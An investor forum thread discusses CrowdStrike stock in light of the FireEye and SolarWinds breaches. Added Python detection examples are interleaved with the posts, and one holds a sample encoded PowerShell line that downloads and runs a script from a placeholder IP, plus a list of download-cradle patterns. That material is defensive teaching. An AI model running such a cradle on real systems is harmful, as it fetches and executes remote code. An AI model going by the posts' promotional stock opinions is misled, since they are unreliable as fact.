Crowdstrike results - my thoughts

Sorry for the short post but couldn’t have agreed more on CRWD as I’m feeling elated having written this a few months back.

My biggest holding today is CRWD and I’m happy to have posted this in October:

For those of you who want a quick understanding of how CRWD works and its integration with Preempt Security, read this:

https://discussion.fool.com/thanks-for-the-write-up-ethan-here39…

And this if you wanted to know about competition from Microsoft Defender:

https://discussion.fool.com/this-is-a-great-point-and-thanks-for…

Cheers!

ronjonb

11 Likes

It’s by far my largest position thanks to Saul and the gang, TMF, Bert, and other folks I follow closely. After the FireEye breach was announced after market close today (notably suggesting Sony and Equifax as vulnerable FireEye customers), I’m curious if these two companies use Crowdstrike in any capacity? You’d think after already having suffered massive breaches in the past they’d be looking to implement a top-tier, cloud-based solution (Crowdstrike, hello). If they’re not already Crowdstrike customers, I’m guessing it won’t be long before they are.

1 Like

ronjonb:

The link you posted does not work

https://discussion.fool.com/thanks-for-the-write-up-ethan-here39…

If it is not too much work, can you post the right link ?

Tiptree, thanks for pointing that out.

Here’s the link: https://discussion.fool.com/thanks-for-the-write-up-ethan-here39…

ronjonb

1 Like

I thought about the FireEye news all day. It’s not just the fact that someone (seems to be a nation state) was able to hack into the most protected systems that they had, it’s also what they stole… the tools that FireEye uses to test for vulnerabilities. With those in their hands it’s going to make everything even more insecure…

First reaction was to worry “do I have too much of my portfolio concentrated in one stock that could plummet if something similar happened to them”? If they attacked FireEye you can bet they have also tried to attack Crowdstrike.

Which made me in turn reflect on the reasons I’m invested in CRWD and how they parallel the same reasons CRWD’s clients use them. Trust. To be invested here we have to fundamentally trust that they know what they are doing and have a very very secure product…

From the NY Times “Mr. Mandia, a former Air Force intelligence officer, said the attackers “tailored their world-class capabilities specifically to target and attack FireEye.” He said they appeared to be highly trained in “operational security” and exhibited “discipline and focus,” while moving clandestinely to escape the detection of security tools and forensic examination. Google, Microsoft and other firms that conduct cybersecurity investigations said they had never seen some of these techniques.”
https://www.nytimes.com/2020/12/08/technology/fireeye-hacked…

It’s hard to not be at least a little nervous with this news…

38 Likes

VitamanD, thanks for bringing this up.

Yes, this is an irony and indeed something to be really concerned about when someone you rely on to protect you is themselves hacked! It’s good that FireEye has come out openly and disclosed it, which will help the entire community. Hopefully the tools that were stolen are mostly open source software and not private code. FireEye had open sourced many of those red team tools here: https://github.com/fireeye/commando-vm

I also looked at the countermeasures they are actively working on on GitHub: https://github.com/fireeye/red_team_tool_countermeasures

For those of you interested/invested in CRWD, here are my thoughts…

Attackers these days are sophisticated and are increasingly targeting the software supply chain for weak links, and also targeting kernels and firmware. Legacy tools are poor at detecting any tampering with firmware or the kernel. CRWD’s kernel exploit prevention and detection tools look at malicious drivers and their behaviors and block any abnormal behavior in real time. They also compare the firmware on a system across all other systems in the community and can detect and alert about such issues pretty promptly.

Some of these attacks also try to take advantage of built-in tools trusted by the operating system, like PowerShell in Windows. This is where traditional/legacy antivirus protection fails miserably. Even with this FireEye hack, and the fact that Microsoft is actively involved in the investigation, I won’t be surprised if PowerShell is in the attack chain (just a possibility).

Here’s another example, the Robbinhood ransomware can load and exploit a signed driver to execute kernel code. By using the legitimate signed driver, the ransomware can encrypt the filesystem and present the user with a ransom note.

The good and comforting part for trusting Crowdstrike is that their tools and platform are designed to prevent attacks like the ones mentioned above. Their threat intelligence and ML are proven to detect and stop such attacks by blocking the execution of suspicious kernel drivers. They can also continuously get reports of PowerShell processes running on all hosts and flag/kill any suspicious processes.

No security company can claim that they can stop breaches and attacks 100% but I feel Crowdstrike comes closest to that and at this point there’s no other competitor that I can think is capable of doing that. Also now with the acceleration of digitization and so many businesses moving to the cloud, Cloud Security is going to be more important than ever!

And since this issue hurts FireEye’s brand it may be an indirect blessing for CRWD. Hope this helps to bring some comfort to those invested in CRWD (including myself 🙂).

Cheers!

ronjonb

76 Likes
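The PowerShell and kernel-driver points in the post above, as an added example that is not part of the original post and is not CrowdStrike’s code or event schema: a small Python triage pass over constructed process-creation and driver-load events. The event fields, weights, trusted-signer list and the "known vulnerable driver" hash are placeholders (assumptions), not vendor telemetry or real threat intel. The two things worth noticing are that an `-EncodedCommand` payload has to be base64/UTF-16LE decoded before any pattern matching is meaningful, and that a valid signature on a driver is not by itself grounds to trust it.

```python
import base64
import re
from dataclasses import dataclass, field

# Constructed detection content (placeholders, not vendor threat intel).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-expression", r"\biex\b",
    r"net\.webclient", r"invoke-webrequest", r"\biwr\b", r"frombase64string",
]
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_FLAG = re.compile(r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)
TRUSTED_SIGNERS = {"microsoft windows"}
SYSTEM_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
# Hypothetical SHA-256 of a validly signed but exploitable third-party driver:
# the bring-your-own-vulnerable-driver pattern the post attributes to RobbinHood.
KNOWN_VULNERABLE_DRIVERS = {"11" * 32}


def _encode(ps: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry in a generic shape (not CrowdStrike's event schema).
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
    {"type": "process", "host": "ws02", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"type": "process", "host": "ws03", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\temp\\deploy.ps1"},
    {"type": "driver", "host": "srv01", "image": "C:\\Windows\\System32\\drivers\\disk.sys",
     "signed": True, "signer": "Microsoft Windows", "sha256": "aa" * 32},
    {"type": "driver", "host": "srv02", "image": "C:\\Windows\\Temp\\vendor_tool.sys",
     "signed": True, "signer": "Example Hardware Vendor", "sha256": "11" * 32},
    {"type": "driver", "host": "srv03", "image": "C:\\Windows\\System32\\drivers\\helper.sys",
     "signed": False, "signer": "", "sha256": "bb" * 32},
]


@dataclass
class Finding:
    host: str
    image: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, weight: int, reason: str) -> None:
        self.score += weight
        self.reasons.append(reason)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or not valid base64."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_powershell(ev: dict) -> Finding:
    f = Finding(ev["host"], ev["image"])
    cmd = ev["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded:
        f.add(2, "encoded command")
    if HIDDEN_FLAG.search(cmd):
        f.add(2, "hidden window")
    if BYPASS_FLAG.search(cmd):
        f.add(1, "profile/execution-policy bypass")
    if ev.get("parent", "").lower() in OFFICE_PARENTS:
        f.add(3, f"spawned by Office application {ev['parent']}")
    text = cmd + " " + decoded  # match on the raw line AND the decoded payload
    for pat in CRADLE_PATTERNS:
        if re.search(pat, text, re.I):
            f.add(3, f"download cradle ({pat})")
            break
    return f


def analyze_driver(ev: dict) -> Finding:
    f = Finding(ev["host"], ev["image"])
    if not ev.get("signed"):
        f.add(5, "unsigned kernel driver")
    if ev.get("sha256", "").lower() in KNOWN_VULNERABLE_DRIVERS:
        f.add(5, "validly signed driver with a known exploitable bug (BYOVD)")
    if not ev["image"].lower().startswith(SYSTEM_DRIVER_DIR):
        f.add(2, "loaded from outside the system driver directory")
    if ev.get("signer", "").lower() not in TRUSTED_SIGNERS and f.score == 0:
        f.add(1, "third-party signer, low-priority review")
    return f


def analyze_events(events: list, threshold: int = 4) -> list:
    """Findings scoring at or above threshold, highest first."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower().endswith("powershell.exe"):
            findings.append(analyze_powershell(ev))
        elif ev["type"] == "driver":
            findings.append(analyze_driver(ev))
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


if __name__ == "__main__":
    for hit in analyze_events(SAMPLE_EVENTS):
        print(f"{hit.host:6} score={hit.score:2} {hit.image}: {'; '.join(hit.reasons)}")
```

The benign admin command on `ws01` scores 1 and stays under the threshold; the Word-spawned, hidden, encoded download cradle on `ws02` is the clear hit, and the two driver events show why the check is "signed and from the expected place and not on a known-vulnerable list", not just "signed".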

Ronjonb,

Thanks for the explanation. I was reading Zscaler’s website last night. I was unable to determine whether use of ZS would have hindered or halted the attack. Would ZS have mitigated the issue?

Thanks
Gordon
Long CRWD and ZS

“Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor”… some of you may have seen this news by now.

In my previous post, I had written about how the software supply chain is being increasingly targeted by bad actors.

This is what is known at this point…

"SolarWinds.Orion.Core.BusinessLayer.dll is a SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. We are tracking the trojanized version of this SolarWinds Orion plug-in as SUNBURST."

For those of you who are non-technical, a .dll file is a compiled code library.

This is making me think how important security has become at the stage of compiling and building software, especially with all the CI/CD workflows growing at an exponential rate. The onus on the developer to ensure security is even more important now.

So, it’s nice to see developments like these from DDOG moving in the right direction…

"The Datadog action continuously monitors dependency and version information of code being deployed. By integrating this data with Datadog’s Continuous Profiler and Snyk’s Vulnerability database, this provides a real-time view of what code is actually accessible and vulnerable in production.

Scanning applications for known vulnerabilities often yields a long list of issues that are difficult to prioritize and subsequently fix. With the data collected by the new action, vulnerability analysis will be performed by the Datadog Continuous Profiler based on Snyk vulnerability metadata.

This allows engineering teams to immediately detect when and how often vulnerable methods are invoked in live environments and prioritize their security fixes based on real-world application behavior."

If you’re interested read more here: https://www.helpnetsecurity.com/2020/12/14/datadog-vulnerabi…

As I write this there’s news that DHS has also been compromised alongside Treasury and Commerce depts…

https://www.reuters.com/article/us-global-cyber-usa-dhs/susp…

So, I’m counting more on CRWD and DDOG to use the information from these hacks to help take security to the next level.

Cheers!

ronjonb

17 Likes
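On the build-stage point in the post above, an added example (not from the post, and not Datadog’s or Snyk’s code) of the simplest form of that check: a CI step that parses a pinned lockfile and matches every pin against an advisory feed using proper numeric version comparison, then fails the build above a chosen severity. The lockfile, the advisory identifiers and the ranges are constructed placeholders; the `Werkzeug` pin is included only to show why comparing versions as strings gets it wrong.

```python
import re

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
SPEC_RE = re.compile(r"^(<=|>=|==|!=|<|>)\s*([0-9A-Za-z.]+)$")
OPS = {
    "<": lambda a, b: a < b, "<=": lambda a, b: a <= b,
    ">": lambda a, b: a > b, ">=": lambda a, b: a >= b,
    "==": lambda a, b: a == b, "!=": lambda a, b: a != b,
}

# Constructed lockfile in pinned requirements.txt form (not a real project).
LOCKFILE = """\
# produced by CI build (constructed sample)
requests==2.24.0
urllib3==1.25.10
jinja2==2.11.2
PyYAML==5.3.1
Werkzeug==1.0.10
cryptography==3.2
"""

# Constructed advisory feed; ids and ranges are placeholders, not real CVE data.
ADVISORIES = [
    {"package": "urllib3", "range": ">=1.0,<1.26.5", "id": "ADV-0001", "severity": "high"},
    {"package": "PyYAML", "range": "<5.4", "id": "ADV-0002", "severity": "critical"},
    {"package": "jinja2", "range": "<2.10.1", "id": "ADV-0003", "severity": "medium"},
    {"package": "requests", "range": ">=2.25.0,<2.25.1", "id": "ADV-0004", "severity": "low"},
    {"package": "Werkzeug", "range": "<1.0.9", "id": "ADV-0005", "severity": "high"},
]


def version_key(version: str, width: int = 4) -> tuple:
    """Numeric, zero-padded tuple so that 1.0.10 > 1.0.9 (string order says the opposite)."""
    parts = [int(p) if p.isdigit() else 0 for p in version.split(".")]
    return tuple(parts + [0] * (width - len(parts)))[:width]


def version_in_range(version: str, spec: str) -> bool:
    """True if version satisfies every comma-separated clause, e.g. '>=1.0,<1.26.5'."""
    v = version_key(version)
    for clause in spec.split(","):
        m = SPEC_RE.match(clause.strip())
        if not m:
            raise ValueError(f"bad specifier clause: {clause!r}")
        op, bound = m.groups()
        if not OPS[op](v, version_key(bound)):
            return False
    return True


def normalize(name: str) -> str:
    return name.lower().replace("_", "-")


def parse_lockfile(text: str) -> dict:
    """Map normalized package name -> pinned version; refuse anything not pinned with ==."""
    pins = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"^([A-Za-z0-9_.-]+)==([0-9A-Za-z.]+)$", line)
        if not m:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        pins[normalize(m.group(1))] = m.group(2)
    return pins


def find_vulnerable(lockfile_text: str, advisories: list) -> list:
    pins = parse_lockfile(lockfile_text)
    findings = []
    for adv in advisories:
        name = normalize(adv["package"])
        installed = pins.get(name)
        if installed and version_in_range(installed, adv["range"]):
            findings.append({"package": name, "installed": installed,
                             "advisory": adv["id"], "severity": adv["severity"]})
    return sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])


def build_gate(lockfile_text: str, advisories: list, fail_on: str = "high") -> bool:
    """CI gate: False (fail the build) if any finding is at or above fail_on."""
    limit = SEVERITY_RANK[fail_on]
    return not any(SEVERITY_RANK[f["severity"]] <= limit
                   for f in find_vulnerable(lockfile_text, advisories))


if __name__ == "__main__":
    for f in find_vulnerable(LOCKFILE, ADVISORIES):
        print(f"{f['severity']:8} {f['package']}=={f['installed']} {f['advisory']}")
    print("build allowed:", build_gate(LOCKFILE, ADVISORIES))
```

This is the "is a vulnerable version present" half only; the runtime part the quoted Datadog text describes (whether the vulnerable method is actually invoked in production) needs profiler data that a lockfile cannot supply.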

I know it’s a bit forward-looking, since this tech isn’t quite ready yet. But how do you think quantum computing will affect security (and therefore security companies)?

NOVA did a great program a year (maybe more?) ago about quantum computing, and once that tech is available it is supposed to render all our present security useless. Supposedly the only thing that can secure data from a quantum computer attack is another quantum computer. I’m sure there’s much more to it than that, but that’s what the program said. And it would seem like a data security company should/would be planning on that eventuality.

1poorguy

1 Like

Cloudflare (surprise!) is working on it:

Everything that is encrypted with today’s public key cryptography can be decrypted with tomorrow’s quantum computers. Imagine waking up one day, and everyone’s diary from 2020 is suddenly public. Although it’s impossible to find enough storage to record keep all the ciphertext sent over the Internet, there are current and active efforts to collect a lot of it. This makes deploying post-quantum cryptography as soon as possible a pressing privacy concern.

Cloudflare is taking steps to accelerate this transition. First, we endeavor to use post-quantum cryptography for most internal services by the end of 2021. Second, we plan to be among the first services to offer post-quantum cipher suites to customers as standards emerge. We’re optimistic that collaborative efforts among NIST, Microsoft, Cloudflare, and other computing companies will yield a robust, standards-based solution. Although powerful quantum computers are likely in our future, Cloudflare is helping to make sure the Internet is ready for when they arrive.

https://blog.cloudflare.com/securing-the-post-quantum-world/…

Current encryption standards are rendered essentially useless with quantum computing algorithms. Sounds like Cloudflare is working towards a migration to “quantum ready” standards to be better prepared for that future.

20 Likes

Thank you for that. I own DDOG and CRWD. Hopefully they are similarly forward-looking (I need to dig into it more since I own those since I haven’t noticed them mentioning it!). I may have to take another look at Cloudflare. I like that the company is planning beyond the next fiscal year.

1poorguy

1 Like

thanks ronjonb, I was secretly hoping you would comment on the SolarWinds attack and who potentially gains from it going forward but didn’t want to waste a precious post asking you for it. It’s pretty clear who loses… though interesting to me that SolarWinds is only down 17% on the news, a drop that is similar in magnitude to what we saw with FireEye the day after their attack was reported. Wondering why they weren’t down more…

I don’t have a great sense of the extent to which this kind of security is sticky and hard to change, presumably these are long term government contracts and it would be hard to switch to another company? And is this something that CRWD could simply step in and replace with their product if asked to do so? Any insights are welcome.

5 Likes

RE quantum computers: They are expected to break conventional RSA encryption using Shor’s algorithm once the computers reach a size of at least 1000 qubits. The current largest is around 50 qubits, and the difficulty in making them larger doesn’t scale linearly. We expect 10 to 30 years to reach the 1000 qubit quantum computer.

Quantum resistant classical algorithms are being developed and standardised. For these there will be no known quantum algorithm to break them …yet.

Even if everything were to be broken tomorrow, there is some security in obscurity. Initially only governments and very large corporations will have quantum computers, and given the internet traffic, they won’t be wasting precious computing resources on hacking your communications. Quantum computers will also be used for drug discovery and physics simulations that can actually lead to revenue.

One solution is quantum key distribution, where cryptographic key data is exchanged in a manner in which you can determine if there was an eavesdropper. To be truly resistant to the quantum computer you need to use a one-time pad, where every data bit has a key bit. This is very slow.

In summary, there is no immediate threat, and a reasonable countermeasure being developed, so no need to panic.

5 Likes
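To make the Shor’s-algorithm remark in the post above concrete, an added example that is not from the post: the classical half of Shor’s method, which recovers the factors of N once the multiplicative order r of a random base a is known. The order is found here by brute force, which is exactly the step that costs exponential time classically and that the quantum period-finding subroutine replaces; everything after it is ordinary number theory. The moduli are toy values assumed for illustration.

```python
from math import gcd
import random


def find_order(a: int, n: int) -> int:
    """Smallest r >= 1 with a^r == 1 (mod n), found by brute force.

    This is the period-finding step. Classically it takes up to ~n multiplications;
    Shor's quantum subroutine finds r in polynomial time in log(n).
    """
    if gcd(a, n) != 1:
        raise ValueError("a must be coprime to n for an order to exist")
    r, x = 1, a % n
    while x != 1:
        x = (x * a) % n
        r += 1
    return r


def factor_from_order(n: int, a: int):
    """Given base a, use its order r to split n. Returns (p, q) or None on a bad a."""
    r = find_order(a, n)
    if r % 2:
        return None                      # odd order: a^(r/2) undefined, retry
    y = pow(a, r // 2, n)                # y^2 == 1 (mod n) but y != 1
    if y == n - 1:
        return None                      # y == -1: trivial square root, retry
    # n divides (y-1)(y+1) but neither factor alone, so a gcd is non-trivial.
    p = gcd(y - 1, n)
    if 1 < p < n:
        return tuple(sorted((p, n // p)))
    q = gcd(y + 1, n)
    if 1 < q < n:
        return tuple(sorted((q, n // q)))
    return None


def shor_factor(n: int, rng=None, attempts: int = 100):
    """Full loop: random base, cheap gcd check, then the order-based split."""
    rng = rng or random.Random(1)        # fixed seed so runs are reproducible
    if n % 2 == 0:
        return (2, n // 2)
    for _ in range(attempts):
        a = rng.randrange(2, n)
        g = gcd(a, n)
        if g > 1:                        # lucky: a shares a factor with n
            return tuple(sorted((g, n // g)))
        split = factor_from_order(n, a)
        if split:
            return split
    return None


if __name__ == "__main__":
    # Textbook instance: n=15, a=7 has order 4; 7^2 = 49 = 4 (mod 15);
    # gcd(4-1, 15) = 3 and gcd(4+1, 15) = 5.
    print(find_order(7, 15), factor_from_order(15, 7))
    print(shor_factor(3233))             # 3233 = 53 * 61, a toy "RSA modulus"
```

Once r is in hand the split is trivial, which is the whole point: an RSA modulus is only safe as long as nobody can find that period efficiently, and that assumption is what post-quantum schemes are designed not to depend on.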

“I know it’s a bit forward-looking, since this tech isn’t quite ready yet. But how do you think quantum computing will affect security (and therefore security companies)?”

Newsweek just had an article concerning quantum computing. We’re lots closer than I thought.

https://www.newsweek.com/2020/12/25/china-leads-quantum-comp…

2 Likes

“So, I’m counting more on CRWD and DDOG to use the information from these hacks to help take security to the next level.”

CRWD has answered some of that and it is really comforting to read this…

"CrowdStrike® customers using the Falcon Identity Protection solutions are already protected from the recent attacks in three ways. They are:

  1. Proactively protected by the ability to reduce the attack surface with better IT hygiene through the understanding of protocol vulnerabilities (e.g., NTLM), identification of stale privileged accounts, mapping of all service accounts, and other exposures of the identity store

  2. Able to mitigate an attack in progress by detecting, in real time, identity-based attack vectors, including the lateral movement techniques used with victims of the SolarWinds breach

  3. Protected by an automated response of the use of identity-specific attacks, including some of the attack testing tools that were stolen as part of the FireEye breach

In addition, CrowdStrike customers already have several capabilities to help defend against the recently disclosed SolarWinds incident:

  1. Use CrowdStrike Threat Graph® to identify affected hosts:
  • The new SolarWinds Vulnerability Dashboard identifies hosts with IOCs related to the SolarWinds vulnerability, including a look-back ability to see which devices have written the compromised files in the last 90 days.
  • The Indicator Graph allows customers to determine whether there has been evidence of affected files and hosts in the past year.

  2. Identify new incidents with specific ML detections:
  • Customers will see detections for IOCs related to the SolarWinds vulnerability on hosts with the Cloud ML detection option enabled.

These recent incidents highlight the value of an identity-centric approach to security. CrowdStrike recognizes that security is not always the core business of its customers, but that is why we make it our core business to help protect them."

Read more here: https://www.crowdstrike.com/blog/identity-security-lesson-fr…

Cheers!

ronjonb

P.S. Based upon my thoughts about ZM in another thread and the strength I see in CRWD’s offerings, I moved some of my ZM proceeds into CRWD (which is already an oversized portion for me) in the past few weeks.

44 Likes
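Covering both the trojanized, validly signed DLL described earlier in the thread and the 90-day look-back in the CrowdStrike quote above, an added example that is not CrowdStrike’s code and is not tied to Threat Graph: a Python scan that hashes recently written binaries under a directory and matches them against a SHA-256 IOC list, with a modification-time window. The IOC hash is computed from constructed sample bytes, not from the real SUNBURST sample (those hashes are published by FireEye and CISA and are deliberately not reproduced here). The match is on content hash because the real DLL carried a valid SolarWinds signature, so a signature check alone would have passed it.

```python
import hashlib
import os
import tempfile
import time
from dataclasses import dataclass

# Constructed stand-in for the trojanized component; its hash is our only IOC.
MALICIOUS_SAMPLE = b"MZ\x90\x00constructed-trojanized-dll-sample"
IOC_SHA256 = {
    hashlib.sha256(MALICIOUS_SAMPLE).hexdigest(): "trojanized Orion DLL (constructed sample)",
}
BINARY_SUFFIXES = (".dll", ".exe", ".sys")


@dataclass
class Hit:
    path: str
    sha256: str
    label: str
    age_days: float


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan(root: str, iocs: dict, lookback_days: int = 90, now: float = None) -> list:
    """Hash every binary written within lookback_days and report IOC matches."""
    now = time.time() if now is None else now
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(BINARY_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            age = (now - os.path.getmtime(path)) / 86400
            if age > lookback_days:
                continue                       # outside the look-back window
            digest = sha256_file(path)
            if digest in iocs:
                hits.append(Hit(path, digest, iocs[digest], round(age, 1)))
    return hits


def build_demo_tree(root: str, now: float = None) -> None:
    """Constructed layout: one recent IOC match, one stale copy, one benign file."""
    now = time.time() if now is None else now

    def put(rel: str, data: bytes, age_days: float) -> None:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        ts = now - age_days * 86400
        os.utime(path, (ts, ts))               # back-date the modification time

    put("Orion/SolarWinds.Orion.Core.BusinessLayer.dll", MALICIOUS_SAMPLE, 12)
    put("Backup/old/SolarWinds.Orion.Core.BusinessLayer.dll", MALICIOUS_SAMPLE, 400)
    put("Orion/Benign.dll", b"MZ\x90\x00legitimate-component", 3)


def run_demo(lookback_days: int = 90) -> list:
    """Build the constructed tree in a temp dir, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan(root, IOC_SHA256, lookback_days=lookback_days)


if __name__ == "__main__":
    for hit in run_demo():
        print(f"{hit.age_days:6.1f}d  {hit.label}: {hit.path}")
```

With the default 90-day window only the recently written copy is reported; widening the window to 500 days picks up the stale backup as well, which is the same trade-off the quoted "last 90 days" versus "past year" look-backs describe. Note that the window is driven by mtime, which an attacker can reset, so a hash-only sweep with no time filter is the safer fallback when the host is already suspected.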

Ronjonb,

CrowdStrike’s release seems a little like double speak. Of course customers are protected -now- because FireEye made the attack known. Would the use of CrowdStrike three months ago have detected the attack, or prevented the hack? Would anything have detected the attack? Zscaler?

Just curious
Gordon

3 Likes

Hi Gordon,

The important thing is that no one is 100% proof against these sophisticated attacks (or safe only till the next attack).
Keep in mind that the whole cybersec community is working on this case right now (and will probably be busy for quite some time). Currently, the ramifications of this attack are still the big unknown and mitigation is going to be super important. For now it looks like Crowdstrike is the only company in this space that appears to have a good understanding and a solid plan for these sorts of attacks, as indicated by their post (link in my post above).

Unfortunately, 2020 has already claimed the regrettable title of having the “highest number of potential intrusions uncovered by Falcon OverWatch in a calendar year.”

CrowdStrike observed more potential intrusions in the first half of 2020 than in all of 2019. 35K in 2019 vs 41K in the 1st half of 2020.

I’m not sure how ZS would have prevented this. The malware was digitally signed by Symantec (which indicates a supply chain attack).

This is what ZS is saying…

"Working with our cloud infrastructure team, we identified that we do make use of the Orion software internally. After investigating, we have determined that we do not use the vulnerable version and are not impacted by this attack. We have multiple safeguards in place to ensure that only authorized personnel can access this environment."

So I still feel that CRWD is best positioned to detect and mitigate such attacks. Beyond that only Crowdstrike will be able to provide answers to your other questions.

Cheers!

ronjonb

16 Likes

Thanks Ronjonb. I also read the Zscaler statement. Of course the company that could have claimed to have spotted this hack/intrusion wouldn’t be able to burn the money as fast as it would be coming in.

Gordon

As mentioned in my post above…

This dashboard from CrowdStrike, and the fact that installing their lightweight agents is so easy, could be the best solution that’s needed by companies that have been affected by this attack (currently Microsoft says it’s more than 40 customers).

1. Use CrowdStrike Threat Graph® to identify affected hosts:
* The new SolarWinds Vulnerability Dashboard identifies hosts with IOCs related to the SolarWinds vulnerability, including a look-back ability to see which devices have written the compromised files in the last 90 days.

This alert from CISA is even more alarming.

https://us-cert.cisa.gov/ncas/alerts/aa20-352a

Crowdstrike’s Incident Response and Forensic services should also be greatly helpful.

The CrowdStrike® Incident Response (IR) Services team works collaboratively with organizations to handle critical security incidents and conduct forensic analysis to resolve immediate cyberattacks and implement a long-term solution to stop recurrences.

Cheers!

ronjonb

13 Likes

It’s my highest confidence position and my largest.

Note to self: when one reads this sequence of words from this individual, pay attention.

11 Likes